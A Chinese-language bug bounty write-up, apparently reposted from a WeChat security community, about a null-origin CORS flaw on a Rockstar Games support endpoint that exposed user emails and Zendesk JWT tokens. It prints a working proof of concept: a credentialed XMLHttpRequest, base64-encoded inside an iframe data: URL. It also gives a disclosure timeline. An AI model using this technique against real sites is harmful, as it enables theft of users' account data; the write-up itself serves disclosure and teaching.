利用鲜有的null源CORS

admin
admin
admin
140559
文章
117
评论
2021年10月20日21:44:57评论92 views字数 2437阅读8分7秒阅读模式

H1报告:https://hackerone.com/reports/317391

前言

时间要追溯到2018年2月份了,正值春节,国内的SRC都在放假,于是乎去国外平台玩玩。本着柿子应该挑软的捏的原则,于是选择了R星(Rockstar Games)这个厂商。笔者挖到此漏洞的时候, 国内对于CORS翻译的文章并不多。


1

BURP大法好


经过一顿瞎操作,有点心灰意冷,没找到任何漏洞。上天总是眷顾努力又勤奋的我,burp的漏描结果里的CORS漏洞亮瞎了我的24K钛合金狗眼。


利用鲜有的null源CORS

发现主要暴露的信息有邮箱地址和zendeskJWT Toekn。


于是去网上搜索关于"null" 源的利用。发现主要有以下两种利用方式:


1. 利用302跳转

2. 用iframe配合data协议,就可以发送一个origin为null的请求。


笔者用第2种方式去演示这个漏洞


<script>    var url = "https://www.rockstargames.com/rockstarsupport2a/users/users/get-user.json";    var req = new XMLHttpRequest();    req.open('get',url,true);    req.setRequestHeader("Accept", "application/json");    req.withCredentials = true;    req.send();    req.onreadystatechange= function(){        if(req.readyState == req.DONE) {document.write(this.responseText)}       }</script>


转换成base64


PHNjcmlwdD4gdmFyIHVybCA9ICJodHRwczovL3d3dy5yb2Nrc3RhcmdhbWVzLmNvbS9yb2Nrc3RhcnN1cHBvcnQyYS91c2Vycy91c2Vycy9nZXQtdXNlci5qc29uIjsgIHZhciByZXEgPSBuZXcgWE1MSHR0cFJlcXVlc3QoKTtyZXEub3BlbignZ2V0Jyx1cmwsdHJ1ZSk7cmVxLnNldFJlcXVlc3RIZWFkZXIoIkFjY2VwdCIsICJhcHBsaWNhdGlvbi9qc29uIik7cmVxLndpdGhDcmVkZW50aWFscyA9IHRydWU7cmVxLnNlbmQoKTtyZXEub25yZWFkeXN0YXRlY2hhbmdlPSBmdW5jdGlvbigpe2lmKHJlcS5yZWFkeVN0YXRlID09IHJlcS5ET05FKSB7ZG9jdW1lbnQud3JpdGUodGhpcy5yZXNwb25zZVRleHQpfSB9PC9zY3JpcHQ+


最终利用poc:


<!DOCTYPE html><html><head>    <title>Rockstargames Get user</title></head><body>    <iframe width=100% height=100% src="data:text/html;base64,PHNjcmlwdD4gdmFyIHVybCA9ICJodHRwczovL3d3dy5yb2Nrc3RhcmdhbWVzLmNvbS9yb2Nrc3RhcnN1cHBvcnQyYS91c2Vycy91c2Vycy9nZXQtdXNlci5qc29uIjsgIHZhciByZXEgPSBuZXcgWE1MSHR0cFJlcXVlc3QoKTtyZXEub3BlbignZ2V0Jyx1cmwsdHJ1ZSk7cmVxLnNldFJlcXVlc3RIZWFkZXIoIkFjY2VwdCIsICJhcHBsaWNhdGlvbi9qc29uIik7cmVxLndpdGhDcmVkZW50aWFscyA9IHRydWU7cmVxLnNlbmQoKTtyZXEub25yZWFkeXN0YXRlY2hhbmdlPSBmdW5jdGlvbigpe2lmKHJlcS5yZWFkeVN0YXRlID09IHJlcS5ET05FKSB7ZG9jdW1lbnQud3JpdGUodGhpcy5yZXNwb25zZVRleHQpfSB9PC9zY3JpcHQ+"></body></html>


利用鲜有的null源CORS


2

时间线


2018.02.19    提交报告

2018.02.20   厂商确认漏洞

2018.03.01   赏金发放

2018.10.17    漏洞修复,H1部分公开

2021.04.21   火线Zone细节公开


3

参考


1. https://xz.aliyun.com/t/2745 CORS安全完全指南


2. https://xz.aliyun.com/t/6263  Exploiting CORS misconfigurations for Bitcoins and bounties


3. https://www.yassineaboukir.com/blog/cors-exploitation-data-exfiltration-when-allowed-origin-is-set-to-null/

利用鲜有的null源CORS

【周度激励】


火线Zone周度激励(6.14 ~ 6.20)


【相关精选文章】


【SOAR】策略实现及思考--Gitlab未授权

Apache Airflow 错误的会话验证漏洞 (CVE-2020-17526)利用


火线Zone是[火线安全平台]运营的封闭式社区,社区成员必须在[火线安全平台]提交有效漏洞才能申请免费加入,符合要求的白帽子可联系[火线小助手]加入。


我们不希望出现劣币驱逐良币的结果,我们不希望一个技术社区变成一个水区!


欢迎具备分享精神的白帽子加入火线Zone,共建一个有技术氛围的优质社区!

利用鲜有的null源CORS
利用鲜有的null源CORS


本文始发于微信公众号(火线Zone):利用鲜有的null源CORS

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2021年10月20日21:44:57
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   利用鲜有的null源CORShttps://cn-sec.com/archives/405605.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息